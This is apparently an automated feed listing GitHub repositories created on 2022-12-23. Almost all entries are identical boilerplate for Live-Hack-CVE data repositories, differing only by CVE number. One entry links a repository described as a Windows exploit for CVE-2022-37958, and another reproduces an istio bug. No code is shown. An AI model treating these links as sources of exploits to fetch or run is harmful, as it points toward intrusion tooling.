**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-2992 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-2992](https://github.com/Live-Hack-CVE/CVE-2017-2992) create time: 2022-12-23T17:45:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-2995 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-2995](https://github.com/Live-Hack-CVE/CVE-2017-2995) create time: 2022-12-23T17:45:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-2993 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-2993](https://github.com/Live-Hack-CVE/CVE-2017-2993) create time: 2022-12-23T17:45:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-2994 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-2994](https://github.com/Live-Hack-CVE/CVE-2017-2994) create time: 2022-12-23T17:45:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-2996 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-2996](https://github.com/Live-Hack-CVE/CVE-2017-2996) create time: 2022-12-23T17:45:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-2982 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-2982](https://github.com/Live-Hack-CVE/CVE-2017-2982) create time: 2022-12-23T17:45:01Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-2984 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-2984](https://github.com/Live-Hack-CVE/CVE-2017-2984) create time: 2022-12-23T17:44:57Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-2986 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-2986](https://github.com/Live-Hack-CVE/CVE-2017-2986) create time: 2022-12-23T17:44:54Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-2985 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-2985](https://github.com/Live-Hack-CVE/CVE-2017-2985) create time: 2022-12-23T17:44:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-2987 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-2987](https://github.com/Live-Hack-CVE/CVE-2017-2987) create time: 2022-12-23T17:43:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-2988 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-2988](https://github.com/Live-Hack-CVE/CVE-2017-2988) create time: 2022-12-23T17:43:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-2990 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-2990](https://github.com/Live-Hack-CVE/CVE-2017-2990) create time: 2022-12-23T17:43:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2017-2991 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2017-2991](https://github.com/Live-Hack-CVE/CVE-2017-2991) create time: 2022-12-23T17:43:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-13447 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-13447](https://github.com/Live-Hack-CVE/CVE-2018-13447) create time: 2022-12-23T18:18:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-19998 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-19998](https://github.com/Live-Hack-CVE/CVE-2018-19998) create time: 2022-12-23T18:18:24Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-19995 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-19995](https://github.com/Live-Hack-CVE/CVE-2018-19995) create time: 2022-12-23T18:18:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-19994 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-19994](https://github.com/Live-Hack-CVE/CVE-2018-19994) create time: 2022-12-23T18:18:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2018-19993 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2018-19993](https://github.com/Live-Hack-CVE/CVE-2018-19993) create time: 2022-12-23T18:17:56Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-1010016 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-1010016](https://github.com/Live-Hack-CVE/CVE-2019-1010016) create time: 2022-12-23T18:20:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-1010054 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-1010054](https://github.com/Live-Hack-CVE/CVE-2019-1010054) create time: 2022-12-23T18:20:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-15062 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-15062](https://github.com/Live-Hack-CVE/CVE-2019-15062) create time: 2022-12-23T18:20:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-16197 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-16197](https://github.com/Live-Hack-CVE/CVE-2019-16197) create time: 2022-12-23T18:19:02Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-16687 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-16687](https://github.com/Live-Hack-CVE/CVE-2019-16687) create time: 2022-12-23T18:18:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-16686 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-16686](https://github.com/Live-Hack-CVE/CVE-2019-16686) create time: 2022-12-23T18:18:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-16685 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-16685](https://github.com/Live-Hack-CVE/CVE-2019-16685) create time: 2022-12-23T18:18:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-16688 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-16688](https://github.com/Live-Hack-CVE/CVE-2019-16688) create time: 2022-12-23T18:18:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-17578 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-17578](https://github.com/Live-Hack-CVE/CVE-2019-17578) create time: 2022-12-23T18:17:52Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-17576 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-17576](https://github.com/Live-Hack-CVE/CVE-2019-17576) create time: 2022-12-23T18:17:37Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-19206 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-19206](https://github.com/Live-Hack-CVE/CVE-2019-19206) create time: 2022-12-23T18:17:33Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-17577 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-17577](https://github.com/Live-Hack-CVE/CVE-2019-17577) create time: 2022-12-23T17:47:29Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2019-17223 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2019-17223](https://github.com/Live-Hack-CVE/CVE-2019-17223) create time: 2022-12-23T17:47:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-11825 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-11825](https://github.com/Live-Hack-CVE/CVE-2020-11825) create time: 2022-12-23T18:20:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-11823 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-11823](https://github.com/Live-Hack-CVE/CVE-2020-11823) create time: 2022-12-23T18:20:11Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13828 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13828](https://github.com/Live-Hack-CVE/CVE-2020-13828) create time: 2022-12-23T18:19:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13239 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13239](https://github.com/Live-Hack-CVE/CVE-2020-13239) create time: 2022-12-23T18:18:58Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-13240 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-13240](https://github.com/Live-Hack-CVE/CVE-2020-13240) create time: 2022-12-23T18:18:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-14475 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-14475](https://github.com/Live-Hack-CVE/CVE-2020-14475) create time: 2022-12-23T18:18:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7996 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7996](https://github.com/Live-Hack-CVE/CVE-2020-7996) create time: 2022-12-23T18:18:17Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-9016 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-9016](https://github.com/Live-Hack-CVE/CVE-2020-9016) create time: 2022-12-23T18:18:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7995 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7995](https://github.com/Live-Hack-CVE/CVE-2020-7995) create time: 2022-12-23T18:18:03Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-7994 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-7994](https://github.com/Live-Hack-CVE/CVE-2020-7994) create time: 2022-12-23T17:46:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2020-35136 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2020-35136](https://github.com/Live-Hack-CVE/CVE-2020-35136) create time: 2022-12-23T17:46:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-26251 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-26251](https://github.com/Live-Hack-CVE/CVE-2021-26251) create time: 2022-12-23T18:22:03Z

**reproducing an old istio bug** : [rsalmond/CVE-2021-34824](https://github.com/rsalmond/CVE-2021-34824) create time: 2022-12-23T18:19:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-25956 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-25956](https://github.com/Live-Hack-CVE/CVE-2021-25956) create time: 2022-12-23T17:46:48Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33816 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33816](https://github.com/Live-Hack-CVE/CVE-2021-33816) create time: 2022-12-23T17:46:45Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33618 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33618](https://github.com/Live-Hack-CVE/CVE-2021-33618) create time: 2022-12-23T17:46:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-30130 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-30130](https://github.com/Live-Hack-CVE/CVE-2021-30130) create time: 2022-12-23T17:44:44Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-33159 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-33159](https://github.com/Live-Hack-CVE/CVE-2021-33159) create time: 2022-12-23T17:43:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-38819 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-38819](https://github.com/Live-Hack-CVE/CVE-2021-38819) create time: 2022-12-23T17:41:04Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-20587 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-20587](https://github.com/Live-Hack-CVE/CVE-2021-20587) create time: 2022-12-23T17:38:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43804 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43804](https://github.com/Live-Hack-CVE/CVE-2021-43804) create time: 2022-12-23T17:36:21Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-37706 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-37706](https://github.com/Live-Hack-CVE/CVE-2021-37706) create time: 2022-12-23T17:36:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2021-43845 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2021-43845](https://github.com/Live-Hack-CVE/CVE-2021-43845) create time: 2022-12-23T17:36:14Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26508 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26508](https://github.com/Live-Hack-CVE/CVE-2022-26508) create time: 2022-12-23T18:22:13Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-29515 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-29515](https://github.com/Live-Hack-CVE/CVE-2022-29515) create time: 2022-12-23T18:22:10Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-29893 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-29893](https://github.com/Live-Hack-CVE/CVE-2022-29893) create time: 2022-12-23T18:22:06Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30459 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30459](https://github.com/Live-Hack-CVE/CVE-2022-30459) create time: 2022-12-23T18:21:30Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30464 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30464](https://github.com/Live-Hack-CVE/CVE-2022-30464) create time: 2022-12-23T18:21:26Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-21794 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-21794](https://github.com/Live-Hack-CVE/CVE-2022-21794) create time: 2022-12-23T18:21:23Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-26024 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-26024](https://github.com/Live-Hack-CVE/CVE-2022-26024) create time: 2022-12-23T18:21:19Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39393 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39393](https://github.com/Live-Hack-CVE/CVE-2022-39393) create time: 2022-12-23T18:21:16Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45188 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45188](https://github.com/Live-Hack-CVE/CVE-2022-45188) create time: 2022-12-23T18:21:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-39395 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-39395](https://github.com/Live-Hack-CVE/CVE-2022-39395) create time: 2022-12-23T18:21:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45195 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45195](https://github.com/Live-Hack-CVE/CVE-2022-45195) create time: 2022-12-23T18:21:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3966 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3966](https://github.com/Live-Hack-CVE/CVE-2022-3966) create time: 2022-12-23T18:21:02Z

**New EternalBlue like exploit for windows** : [researcher159/CVE-2022-37958-Windows-RCE](https://github.com/researcher159/CVE-2022-37958-Windows-RCE) create time: 2022-12-23T18:12:51Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-22293 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-22293](https://github.com/Live-Hack-CVE/CVE-2022-22293) create time: 2022-12-23T17:46:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-30875 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-30875](https://github.com/Live-Hack-CVE/CVE-2022-30875) create time: 2022-12-23T17:46:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-45196 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-45196](https://github.com/Live-Hack-CVE/CVE-2022-45196) create time: 2022-12-23T17:46:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3963 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3963](https://github.com/Live-Hack-CVE/CVE-2022-3963) create time: 2022-12-23T17:46:28Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-0174 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-0174](https://github.com/Live-Hack-CVE/CVE-2022-0174) create time: 2022-12-23T17:46:25Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-0731 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-0731](https://github.com/Live-Hack-CVE/CVE-2022-0731) create time: 2022-12-23T17:46:22Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-2060 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-2060](https://github.com/Live-Hack-CVE/CVE-2022-2060) create time: 2022-12-23T17:46:18Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-0224 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-0224](https://github.com/Live-Hack-CVE/CVE-2022-0224) create time: 2022-12-23T17:46:15Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-0746 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-0746](https://github.com/Live-Hack-CVE/CVE-2022-0746) create time: 2022-12-23T17:46:12Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-0414 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-0414](https://github.com/Live-Hack-CVE/CVE-2022-0414) create time: 2022-12-23T17:46:09Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-0819 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-0819](https://github.com/Live-Hack-CVE/CVE-2022-0819) create time: 2022-12-23T17:46:05Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3971 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3971](https://github.com/Live-Hack-CVE/CVE-2022-3971) create time: 2022-12-23T17:45:07Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3969 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3969](https://github.com/Live-Hack-CVE/CVE-2022-3969) create time: 2022-12-23T17:44:47Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-41913 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-41913](https://github.com/Live-Hack-CVE/CVE-2022-41913) create time: 2022-12-23T17:44:41Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3903 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3903](https://github.com/Live-Hack-CVE/CVE-2022-3903) create time: 2022-12-23T17:44:38Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3238 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3238](https://github.com/Live-Hack-CVE/CVE-2022-3238) create time: 2022-12-23T17:44:35Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2022-3362 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2022-3362](https://github.com/Live-Hack-CVE/CVE-2022-3362) create time: 2022-12-23T17:44:31Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-0888 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-0888](https://github.com/Live-Hack-CVE/CVE-2013-0888) create time: 2022-12-23T17:02:55Z

**This repository contains a collection of data files on known Common Vulnerabilities and Exposures (CVEs). Each file is in JSON format and contains detailed information about the vulnerability, such as its reference number, description, impact, and resolution. CVE: CVE-2013-0890 Made by Sn0wAlice. ❤️** : [Live-Hack-CVE/CVE-2013-0890](https://github.com/Live-Hack-CVE/CVE-2013-0890) create time: 2022-12-23T17:02:52Z

